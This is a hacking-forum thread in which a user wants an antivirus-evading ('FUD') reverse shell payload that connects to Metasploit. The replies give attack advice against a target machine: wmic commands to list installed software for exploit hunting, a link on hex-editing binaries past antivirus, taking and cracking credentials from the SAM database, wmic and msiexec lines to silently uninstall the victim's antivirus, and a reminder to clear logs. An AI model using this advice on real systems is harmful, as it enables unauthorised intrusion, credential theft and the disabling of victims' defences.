Jump to content

Recommended Posts

Posted

Hi.. First post. Hope i dont break any rules..

I was playing around with Metasploit, and i wanted to get my hands on way to avoid AV.

So i trid cryptes and they maybe good but not great. I saw a video ‪"DerbyCon 3 0 3202 Antivirus Evasion Lessons Learned Thelightcosine"‬‏. I didn't just skipped to the end to get my answers which is how can i get my payloads FUD. Cause i enjoyed the video.

Well.. So i understood it was or paying 5000$ a year for metasploit pro and get my hands on Dynamic Payloads :wub: , or learn to code and make myself my own reverse tcp script that will be FUD :ph34r: .

But i dont have the money ot the skillz :mellow:.

So i gave it up.

No im joking.. I found a python script online.

Its a server script, that doing the lisening to the port and client script thats making the reverse tcp connection.

Its working and all but there is no point in just having connection to windows command line.

Metasploit have all those goodies that i can use...

But the problem is that when i run it(client script), i cant have it connect back to metasploid, only to the python "server" script.

BTW i can have it connect to netcat but the connection allso break when i run a command like "cd c:\"

I looked at the code and tried figuring out why, but the only reason i can think of is that netcat and metasploit are supposed to be used with there own scripts.

But i hope there is way.. is there??? :unsure:

Posted (edited)

Maybe this will help?

Note, this isn't Metasploit, but if you're clever, you can do almost everything sploit can, or gather enough info to then use sploit.

Reverse shell with the above method > Gather vulnerability details > Metasploit

Edited by haze1434
Posted (edited)

there is no point in just having connection to windows command line

I just re-read your post. Perhaps that's where you already got the details from!

I disagree though. Why not use the method you've already had success with, to get CMD, then gather information to find an exploit you can use in 'sploit?

For example, with CMD you can use...

wmic product list brief

... to get all of the software and version numbers of the target PC, then try and find an exploit in Metasploit for it.

Think of the CMD reverse shell as recon, rather than the exploit itself. But you are perhaps underestimating CMD. Yes, whilst it's not as 'classy' as other tools, you can do a lot with CMD. Amend registry, move files, open ports etc.

Edited by haze1434
Posted

If you wanna it not detected it's a matter of using obfuscation with python im not 100% on how to obfuscate that but doing a exe would be something pretty simple a friend made a video on how to do that with a EXE.

http://www.freecst.com/howto-hex-editing-bypass-antivirus/

Posted

Thanks for the help..

Yea i know i can use win cmd to gather info.. But if i already have the ability to drop exe file on the machine and have hem run it, i rather it will be a payload that will give me access to everything including to transfer files.

Thanks for vid i'll watch it..

I found a C source code for a Reverse TCP Shell that work with Metasploit, but i dont understand C enough to change it to make it FUD.

Maybe using the Hex editing like in the video.

  • 3 weeks later...
Posted (edited)
On ‎01‎/‎06‎/‎2016 at 2:44 PM, cooper said:

Does AV honour this request?

Good point. I believe maybe 60% of AV programs would honour the request if we send the command as admin. The rest would probably block it, but it'd be worth a try in the first instance.

One could get the admin credentials using CMD by grabbing them from the SAM database (e.g; C:\WINDOWS\system32\config) and decrypting them. Again, this would depend on the password strength, but then a lot of hacks usually do.

If this didn't work, I'd also try uninstalling the AV program using admin CMD. Maybe something like;

product where name="[Name of AV program]" call uninstall

or we could perhaps use wmic to get the reference for the program and then msiexec...

wmic product list brief
MsiExec.exe /X{0000-00000-00000-00000-00000} /qb

Worth a try! Just don't forget to clear those logs :wink:

Edited by haze1434
Amended script.
  • 2 weeks later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...